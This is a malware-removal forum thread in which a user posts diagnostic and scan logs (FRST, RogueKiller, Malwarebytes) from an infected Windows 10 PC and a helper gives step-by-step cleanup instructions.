Task: {EB684CE2-5E4F-4692-B7BC-796F32D5014C} - System32\Tasks\CCleaner Update => C:\Program Files\CCleaner\CCUpdate.exe [2019-02-08] (Piriform Software Ltd -> Piriform Software Ltd)
Task: {FC33DBE7-C910-4F1C-B383-007FD7E6ABC7} - System32\Tasks\Microsoft\Windows\Application Experience\Microsoft Compatibility Appraiser => %windir%\system32\rundll32.exe generaltel.dll,RunTelemetryW
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
==================== Shortcuts & WMI ========================
(The entries could be listed to be restored or removed.)
==================== Loaded Modules (Whitelisted) ==============
2015-09-10 13:08 - 2015-09-10 13:08 - 000032768 _____ () C:\Windows\SYSTEM32\licensemanagerapi.dll
2019-02-08 21:46 - 2019-02-07 20:09 - 003780096 _____ () C:\ProgramData\Logic Cramble\set.exe
2015-09-10 13:08 - 2015-09-10 13:08 - 000404480 _____ () C:\Windows\System32\diagtrack_wininternal.dll
2015-09-10 13:08 - 2015-09-10 13:08 - 002498808 _____ () C:\Windows\system32\CoreUIComponents.dll
2015-07-10 11:19 - 2015-07-10 11:19 - 000429056 _____ () C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\QuickActions.dll
2015-09-10 13:08 - 2015-09-10 13:08 - 006569472 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.dll
2015-07-10 11:13 - 2015-09-10 13:08 - 000471040 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
2015-09-10 13:08 - 2015-09-10 13:08 - 001808384 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.BackgroundTask.dll
2015-09-10 13:08 - 2015-09-10 13:08 - 002274816 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersUI.dll
2015-07-10 11:13 - 2015-09-10 13:08 - 000210432 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.ProxyStub.dll
2019-02-08 21:47 - 2017-12-12 11:35 - 000281600 _____ () C:\Program Files (x86)\Multitimer\Multitimer.exe
2019-02-08 23:02 - 2019-02-06 10:00 - 002684400 _____ () C:\Program Files (x86)\Google\Chrome\Application\72.0.3626.96\swiftshader\libglesv2.dll
2019-02-08 23:02 - 2019-02-06 10:00 - 000156656 _____ () C:\Program Files (x86)\Google\Chrome\Application\72.0.3626.96\swiftshader\libegl.dll
2019-02-08 23:02 - 2019-02-06 10:00 - 005186032 _____ () C:\Program Files (x86)\Google\Chrome\Application\72.0.3626.96\libglesv2.dll
2019-02-08 23:02 - 2019-02-06 10:00 - 000117232 _____ () C:\Program Files (x86)\Google\Chrome\Application\72.0.3626.96\libegl.dll
2019-02-09 00:44 - 2019-02-09 00:44 - 001083392 _____ () C:\Users\Thomazing!\AppData\Local\Temp\is-UBPC7.tmp\i2z4dmklduc.tmp
2019-02-08 21:50 - 2019-02-08 21:50 - 001612288 _____ () C:\Windows\bxetfbicyncsflqei.bxetf
2019-02-09 00:44 - 2008-10-15 16:44 - 000205312 _____ () C:\Users\Thomazing!\AppData\Local\Temp\is-0ODST.tmp\itdownload.dll
==================== Alternate Data Streams (Whitelisted) =========
(If an entry is included in the fixlist, only the ADS will be removed.)
==================== Safe Mode (Whitelisted) ===================
(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
==================== Association (Whitelisted) ===============
(If an entry is included in the fixlist, the registry item will be restored to default or removed.)
==================== Internet Explorer trusted/restricted ===============
(If an entry is included in the fixlist, it will be removed from the registry.)
==================== Hosts content: ==========================
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
2015-07-31 06:42 - 2019-02-08 21:46 - 002097392 _____ C:\Windows\system32\drivers\etc\hosts
127.0.0.1 space1.adminpressure.space
127.0.0.1 trackpressure.website
127.0.0.1 htagzdownload.pw
127.0.0.1 texttotalk.org
127.0.0.1 360devtraking.website
127.0.0.1 room1.360dev.info
127.0.0.1 djapp.info
127.0.0.1 technologievimy.com
==================== Other Areas ============================
(Currently there is no automatic fix for this section.)
HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\Control Panel\Desktop\\Wallpaper ->
DNS Servers: Media is not connected to internet.
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: Off)
Windows Firewall is enabled.
==================== MSCONFIG/TASK MANAGER disabled items ==
If an entry is included in the fixlist, it will be removed.
==================== FirewallRules (Whitelisted) ===============
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
FirewallRules: [{34014409-F047-4511-8A51-E0086652B848}] => (Allow) C:\Users\Thomazing!\AppData\Roaming\uTorrent\uTorrent.exe (BitTorrent Inc -> BitTorrent Inc.)
FirewallRules: [{EE26B7B5-4F57-4DB5-8AAD-A1A7AEEA5CF8}] => (Allow) C:\Users\Thomazing!\AppData\Roaming\uTorrent\uTorrent.exe (BitTorrent Inc -> BitTorrent Inc.)
FirewallRules: [{2F9DA978-66F3-44BD-BE3B-F5490BFA7C57}] => (Allow) C:\Windows\rss\csrss.exe ()
FirewallRules: [{11A88E17-3A04-4D89-B347-E025C0716D1A}] => (Allow) C:\Users\Thomazing!\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe (EpicNet Inc.)
FirewallRules: [{76CDF517-F312-44A8-B7D6-E74702BA4382}] => (Allow) C:\Windows\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{3F615D37-89C0-45E6-842F-5EB82ECD2C76}] => (Allow) C:\Windows\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{D3020994-C154-42F4-93AA-C0B3C54504AB}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation)
FirewallRules: [{1DE617D9-CAAF-4865-88CC-8B52F2C6CE8C}] => (Allow) C:\Windows\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{47792053-3338-4A6F-AE9E-447B51B4287A}] => (Allow) C:\Windows\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{0A843646-B083-4688-8D3B-A42EB241BEAF}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation)
FirewallRules: [{9A85637C-ABF5-4BC7-8DBF-AEAC9B50890A}] => (Allow) C:\Windows\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{4F5E25DC-8146-46D7-B3C7-DAEBA3A90326}] => (Allow) C:\Windows\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{2B39C486-2C5E-45FF-B698-F6C65CB96345}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation)
FirewallRules: [{456C25A6-8A05-4EC5-B99F-03BA6956BF72}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google LLC -> Google Inc.)
FirewallRules: [{92C0DFAF-0F89-4F63-A042-BBB6C7AEAE3C}] => (Allow) C:\Program Files\CCleaner\CCUpdate.exe (Piriform Software Ltd -> Piriform Software Ltd)
FirewallRules: [{D453C330-AB73-4D2F-AEDC-5ACC2FECD2EF}] => (Allow) C:\Program Files\CCleaner\CCUpdate.exe (Piriform Software Ltd -> Piriform Software Ltd)
FirewallRules: [{76C2B05D-59C7-4F00-A6FA-E3B3EC26DF57}] => (Allow) C:\Windows\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{A5393F9A-F08B-4AF7-8E8A-5552C87EB8A1}] => (Allow) C:\Windows\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{6A332DC7-031B-46F5-8EE9-4BC596EEC559}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation)
==================== Restore Points =========================
ATTENTION: System Restore is disabled
==================== Faulty Device Manager Devices =============
==================== Event log errors: =========================
Application errors:
==================
Error: (02/09/2019 12:44:21 AM) (Source: MsiInstaller) (EventID: 11327) (User: DESKTOP-OHFLJFD)
Description: Продукт: Microsoft.NET -- Ошибка 1327. Недопустимое устройство: G:\
Error: (02/09/2019 12:42:30 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: DESKTOP-OHFLJFD)
Description: Activation of app Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI failed with error: -2144927141 See the Microsoft-Windows-TWinUI/Operational log for additional information.
Error: (02/09/2019 12:38:44 AM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program Multitimer.exe version 1.0.0.0 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Security and Maintenance control panel.
Process ID: 10e0
Start Time: 01d4bfcbbc5e5969
Termination Time: 4294967295
Application Path: C:\Program Files (x86)\Multitimer\Multitimer.exe
Report Id: f84380ae-2bbf-11e9-8d72-0026b664e783
Faulting package full name:
Faulting package-relative application ID:
Error: (02/08/2019 11:15:34 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program Multitimer.exe version 1.0.0.0 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Security and Maintenance control panel.
Process ID: 17e4
Start Time: 01d4bfbec9052d5e
Termination Time: 4294967295
Application Path: C:\Program Files (x86)\Multitimer\Multitimer.exe
Report Id: 5e394fbf-2bb4-11e9-8d71-0026b664e783
Faulting package full name:
Faulting package-relative application ID:
Error: (02/08/2019 11:15:24 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: DESKTOP-OHFLJFD)
Description: Activation of app Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy!App failed with error: -2147023170 See the Microsoft-Windows-TWinUI/Operational log for additional information.
Error: (02/08/2019 11:15:22 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: ShellExperienceHost.exe, version: 10.0.10240.16425, time stamp: 0x55bec5f5
Faulting module name: CoreUIComponents.dll, version: 0.0.0.0, time stamp: 0x55d2cdf8
Exception code: 0xc0000005
Fault offset: 0x0000000000061f8e
Faulting process id: 0x13e8
Faulting application start time: 0x01d4bfbf1ac83bd3
Faulting application path: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe
Faulting module path: C:\Windows\system32\CoreUIComponents.dll
Report Id: 8f9dc01a-6d94-4173-94ac-714bb15ffaf6
Faulting package full name: Microsoft.Windows.ShellExperienceHost_10.0.10240.16384_neutral_neutral_cw5n1h2txyewy
Faulting package-relative application ID: App
System errors:
=============
Error: (02/09/2019 12:42:30 AM) (Source: DCOM) (EventID: 10010) (User: DESKTOP-OHFLJFD)
Description: The server CortanaUI.AppXd4tad4d57t4wtdbnnmb8v2xtzym8c1n8.mca did not register with DCOM within the required timeout.
Error: (02/09/2019 12:42:27 AM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The Sync Host_Session1 service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 10000 milliseconds: Restart the service.
Error: (02/09/2019 12:31:40 AM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The Windows Installer service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 120000 milliseconds: Restart the service.
Error: (02/09/2019 12:29:33 AM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: A timeout was reached (30000 milliseconds) while waiting for the Sync Host_Session1 service to connect.
Error: (02/09/2019 12:29:23 AM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The Sync Host_Session1 service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 10000 milliseconds: Restart the service.
Error: (02/08/2019 11:05:26 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The NmU2M2EwMWU service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 5000 milliseconds: Restart the service.
Windows Defender:
===================================
Date: 2019-02-08 22:58:52.037
Description:
Windows Defender has detected malware or other potentially unwanted software.
For more information please see the following:
http://go.microsoft.com/fwlink/?link...0&enterprise=0
Name: HackTool:Win32/AutoKMS
ID: 2147685180
Severity: Medium
Category: Tool
Path: file:_C:\Users\Thomazing!\AppData\Local\Temp\Rar$EXa15208.40575\Gold_Snake_Portable_v10.1.8\KMSpico Portable\cert\installAll.cmd
Detection Origin: Local machine
Detection Type: Concrete
Detection Source: System
Process Name: Unknown
Signature Version: AV: 1.199.1615.0, AS: 1.199.1615.0, NIS: 114.1.0.0
Engine Version: AM: 1.1.11701.0, NIS: 2.1.11502.0
Date: 2019-02-08 22:28:36.285
Description:
Windows Defender has detected malware or other potentially unwanted software.
For more information please see the following:
http://go.microsoft.com/fwlink/?link...0&enterprise=0
Name: HackTool:Win32/AutoKMS
ID: 2147685180
Severity: Medium
Category: Tool
Path: file:_C:\Users\Thomazing!\AppData\Local\Temp\Rar$EXa15208.40575\Gold_Snake_Portable_v10.1.8\KMSpico Portable\cert\installAll.cmd
Detection Origin: Local machine
Detection Type: Concrete
Detection Source: System
Process Name: Unknown
Signature Version: AV: 1.199.1615.0, AS: 1.199.1615.0, NIS: 114.1.0.0
Engine Version: AM: 1.1.11701.0, NIS: 2.1.11502.0
Date: 2019-02-08 22:22:31.668
Description:
Windows Defender has detected malware or other potentially unwanted software.
For more information please see the following:
http://go.microsoft.com/fwlink/?link...0&enterprise=0
Name: HackTool:Win32/AutoKMS
ID: 2147685180
Severity: Medium
Category: Tool
Path: file:_C:\Users\Thomazing!\AppData\Local\Temp\Rar$EXa15208.40575\Gold_Snake_Portable_v10.1.8\KMSpico Portable\cert\installAll.cmd
Detection Origin: Local machine
Detection Type: Concrete
Detection Source: System
Process Name: Unknown
Signature Version: AV: 1.199.1615.0, AS: 1.199.1615.0, NIS: 114.1.0.0
Engine Version: AM: 1.1.11701.0, NIS: 2.1.11502.0
Date: 2019-02-08 22:08:55.987
Description:
Windows Defender has detected malware or other potentially unwanted software.
For more information please see the following:
http://go.microsoft.com/fwlink/?link...0&enterprise=0
Name: HackTool:Win32/AutoKMS
ID: 2147685180
Severity: Medium
Category: Tool
Path: file:_C:\Users\Thomazing!\AppData\Local\Temp\Rar$EXa15208.40575\Gold_Snake_Portable_v10.1.8\KMSpico Portable\cert\installAll.cmd
Detection Origin: Local machine
Detection Type: Concrete
Detection Source: System
Process Name: Unknown
Signature Version: AV: 1.199.1615.0, AS: 1.199.1615.0, NIS: 114.1.0.0
Engine Version: AM: 1.1.11701.0, NIS: 2.1.11502.0
Date: 2019-02-08 22:00:18.323
Description:
Windows Defender has detected malware or other potentially unwanted software.
For more information please see the following:
http://go.microsoft.com/fwlink/?link...0&enterprise=0
Name: HackTool:Win32/AutoKMS
ID: 2147685180
Severity: Medium
Category: Tool
Path: file:_C:\Users\Thomazing!\AppData\Local\Temp\Rar$EXa15208.40575\Gold_Snake_Portable_v10.1.8\KMSpico Portable\cert\installAll.cmd;file:_D:\Thomas' Backup (1-22-16)\Thomas Entena\Documents\Set-Up\windows 10\Gold_Snake_Portable_v10.1.8\KMSpico Portable\cert\installAll.cmd
Detection Origin: Local machine
Detection Type: Concrete
Detection Source: Real-Time Protection
Process Name: C:\Program Files\WinRAR\WinRAR.exe
Signature Version: AV: 1.199.1615.0, AS: 1.199.1615.0, NIS: 114.1.0.0
Engine Version: AM: 1.1.11701.0, NIS: 2.1.11502.0
==================== Memory info ===========================
Processor: Pentium(R) Dual-Core CPU T4400 @ 2.20GHz
Percentage of memory in use: 35%
Total physical RAM: 8059.98 MB
Available physical RAM: 5186.63 MB
Total Virtual: 9979.98 MB
Available Virtual: 6556.94 MB
==================== Drives ================================
Drive c: () (Fixed) (Total:97.66 GB) (Free:80.22 GB) NTFS
Drive e: (Abebi) (Fixed) (Total:125.81 GB) (Free:21.43 GB) NTFS
\\?\Volume{134fa4c9-0000-0000-0000-100000000000}\ (System Reserved) (Fixed) (Total:0.1 GB) (Free:0.06 GB) NTFS
==================== MBR & Partition Table ==================
========================================================
Disk: 0 (MBR Code: Windows 7/8/10) (Size: 223.6 GB) (Disk ID: 134FA4C9)
Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=97.7 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=125.8 GB) - (Type=0F Extended)
==================== End of Addition.txt ============================
-
February 8th, 2019, 05:04 PM
#3
Please observe the following rules:
- Read all of my instructions very carefully. Your mistakes during the cleaning process may have very serious consequences, like an unbootable computer.
- If you're stuck, or you're not sure about a certain step, always ask before doing anything else.
- Please refrain from running any tools, fixes or applying any changes to your computer other than those I suggest.
- Never run more than one scan at a time.
- Keep updating me regarding your computer's behavior, good or bad.
- The cleaning process, once started, has to be completed. Even if your computer appears to act better, it may still be infected. Once the computer is totally clean, I'll certainly let you know.
- If you leave the topic without explanation in the middle of a cleaning process, you may not be eligible to receive any more help in the malware removal forum.
- I close my topics if you have not replied in 5 days. If you need more time, simply let me know. If I closed your topic and you need it to be reopened, simply PM me.
================================
Uninstall the following unwanted programs:
CloudNet
DiskWMpower
Multitimer
Download RogueKiller from one of the following links and save it to your Desktop:
Link 1
Link 2
- Close all the running programs.
- Double-click on the downloaded setup.exe file to install the program.
- Click on the Start Scan button.
- Click on another Start Scan button.
- Wait until the Status box shows Scan Finished.
- Click on Remove Selected.
- Wait until the Status box shows Deleting Finished.
- Click on Report and copy/paste the content of the Notepad into your next reply.
- RKreport.txt can also be found on your desktop.
- If more than one log is produced, post all logs.
Please download Malwarebytes to your desktop.
- Double-click mb3-setup-consumer-{version}.exe and follow the prompts to install the program.
- Then click Finish.
- Once the program has fully updated, select Scan Now on the Dashboard, or select Threat Scan from the Scan menu.
- If another update of the definitions is available, it will be implemented before the rest of the scanning procedure.
- When the scan is complete, make sure that all Threats are selected, and click Remove Selected.
- Restart your computer when prompted to do so.
- The Scan log is available through History -> Application logs. Please post its contents in your next reply.
Please download AdwCleaner by Xplode and save to your Desktop.
- Double-click on AdwCleaner.exe to run the tool.
- Vista/Windows 7/8/10 users: right-click and select Run As Administrator.
- The tool will start to update the database if one is required.
- Click on the Scan button.
- AdwCleaner will begin...be patient as the scan may take some time to complete.
- After the scan has finished, click on the Logfile button.
- A window will open which lists the logs of your scans.
- Click on the Scan tab.
- Double-click the most recent scan, which will be at the top of the list...the log will appear.
- Review the results...see note below
- After reviewing the log, click on the Clean button.
- Press OK when asked to close all programs and follow the onscreen prompts.
- Press OK again to allow AdwCleaner to restart the computer and complete the removal process.
- After rebooting, a logfile report (AdwCleaner[CX].txt) will open automatically (where the largest value of X represents the most recent report).
- To open a Cleaning log, launch AdwCleaner, click on the Logfile button, click on the Cleaning tab and double-click the log at the top of the list.
- Copy and paste the contents of AdwCleaner[CX].txt in your next reply.
- A copy of all logfiles is saved to C:\AdwCleaner.
-- Note: The contents of the AdwCleaner log file may be confusing. Unless you see a program name or entry that you recognize and know should not be removed, don't worry about it. If you see an entry you want to keep, return to AdwCleaner before cleaning...all detected items will be listed (and checked) in each tab. Click on and uncheck any items you want to keep.
-
February 9th, 2019, 12:53 AM
#4
Here:
RogueKiller REPORT 1:
RogueKiller Anti-Malware V13.1.4.0 (x64) [Feb 4 2019] (Free) by Adlice Software
mail : https://adlice.com/contact/
Website : https://adlice.com/download/roguekiller/
Operating System : Windows 10 (10.0.10240) 64 bits
Started in : Normal mode
User : Thomazing! [Administrator]
Started from : C:\Program Files\RogueKiller\RogueKiller64.exe
Signatures : 20190204_072850, Driver : Loaded
Mode : Standard Scan, Scan -- Date : 2019/02/09 08:00:39 (Duration : 00:12:46)
Switches : -refid 3
¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Processes ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Process Modules ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Services ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Tasks ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Registry ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ WMI ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Hosts File ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Files ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
[Tr.Winmon (Malicious)] (file) WinmonProcessMonitor.sys -- C:\Windows\System32\drivers\WinmonProcessMonitor.sys -> Found
¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Web browsers ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
RogueKiller REPORT 2:
RogueKiller Anti-Malware V13.1.4.0 (x64) [Feb 4 2019] (Free) by Adlice Software
mail : https://adlice.com/contact/
Website : https://adlice.com/download/roguekiller/
Operating System : Windows 10 (10.0.10240) 64 bits
Started in : Normal mode
User : Thomazing! [Administrator]
Started from : C:\Program Files\RogueKiller\RogueKiller64.exe
Signatures : 20190204_072850, Driver : Loaded
Mode : Standard Scan, Scan -- Date : 2019/02/09 08:00:39 (Duration : 00:12:46)
Switches : -refid 3
¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Processes ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Process Modules ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Services ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Tasks ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Registry ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ WMI ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Hosts File ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Files ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
[Tr.Winmon (Malicious)] (file) WinmonProcessMonitor.sys -- C:\Windows\System32\drivers\WinmonProcessMonitor.sys -> Found
¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Web browsers ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
-
February 9th, 2019, 12:54 AM
#5
Malwarebytes
www.malwarebytes.com
-Log Details-
Scan Date: 2/9/19
Scan Time: 12:07 PM
Log File: 2ea0ec9e-2c20-11e9-a4d9-0026b664e783.json
-Software Information-
Version: 3.7.1.2839
Components Version: 1.0.538
Update Package Version: 1.0.9182
License: Trial
-System Information-
OS: Windows 10 (Build 10240.16487)
CPU: x64
File System: NTFS
User: DESKTOP-OHFLJFD\Thomazing!
-Scan Summary-
Scan Type: Threat Scan
Scan Initiated By: Manual
Result: Completed
Objects Scanned: 255377
Threats Detected: 264
Threats Quarantined: 256
Time Elapsed: 14 min, 31 sec
-Scan Options-
Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Disabled
Heuristics: Enabled
PUP: Detect
PUM: Detect
-Scan Details-
Process: 2
Adware.Tuto4PC.Generic, C:\USERS\THOMAZING!\APPDATA\ROAMING\MO24N4005VT\I2Z4DMKLDUC.EXE, Quarantined, [3707], [521959],1.0.9182
Adware.Tuto4PC.Generic, C:\USERS\THOMAZING!\APPDATA\ROAMING\M1DFK02FRCW\KPAWYBAEOIA.EXE, Quarantined, [3707], [521959],1.0.9182
Module: 2
Adware.Tuto4PC.Generic, C:\USERS\THOMAZING!\APPDATA\ROAMING\MO24N4005VT\I2Z4DMKLDUC.EXE, Quarantined, [3707], [521959],1.0.9182
Adware.Tuto4PC.Generic, C:\USERS\THOMAZING!\APPDATA\ROAMING\M1DFK02FRCW\KPAWYBAEOIA.EXE, Quarantined, [3707], [521959],1.0.9182
Registry Key: 41
PUP.Optional.CloudNet, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\ScheduledUpdate, Quarantined, [6124], [448845],1.0.9182
PUP.Optional.CloudNet, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{43DBA25B-CE5F-49A9-898C-47539A2F79EE}, Quarantined, [6124], [448845],1.0.9182
PUP.Optional.CloudNet, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\LOGON\{43DBA25B-CE5F-49A9-898C-47539A2F79EE}, Quarantined, [6124], [448845],1.0.9182
RiskWare.BitCoinMiner, HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\CloudNet, Quarantined, [732], [512160],1.0.9182
RiskWare.BitCoinMiner, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\{44244107-8600-4170-9FE9-B04F411A8CD2}, Quarantined, [732], [512160],1.0.9182
RiskWare.BitCoinMiner, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{5255E603-D784-4BD0-89A8-EE3FBB6E0334}, Quarantined, [732], [512160],1.0.9182
RiskWare.BitCoinMiner, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\PLAIN\{5255E603-D784-4BD0-89A8-EE3FBB6E0334}, Quarantined, [732], [512160],1.0.9182
RiskWare.BitCoinMiner, HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\SOFTWARE\EpicNet Inc., Quarantined, [732], [451809],1.0.9182
Adware.Tuto4PC, HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\SOFTWARE\MICROSOFT\EWMON, Quarantined, [2805], [411133],1.0.9182
PUP.Optional.Linkury.ACMB1, HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{ielnksrch}, Quarantined, [797], [259987],1.0.9182
Adware.Wajam, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\NLASVC\PARAMETERS\INTERNET\MANUALPROXIES, Quarantined, [494], [-1],0.0.0
Trojan.Agent, HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\Amazon assistant 1.0, Quarantined, [416], [533745],1.0.9182
Trojan.Agent, HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\Amazon assistant 2.0, Quarantined, [416], [533745],1.0.9182
Trojan.Agent.E, HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\Ebayssistant 1.0, Quarantined, [3714], [623237],1.0.9182
Trojan.Agent.E, HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\Look Picture Tool, Quarantined, [3714], [623238],1.0.9182
Trojan.Agent.E, HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\telezilla, Quarantined, [3714], [623239],1.0.9182
PUP.Optional.Tuto4PC, HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\SOFTWARE\MICROSOFT\wewewe, Quarantined, [688], [339689],1.0.9182
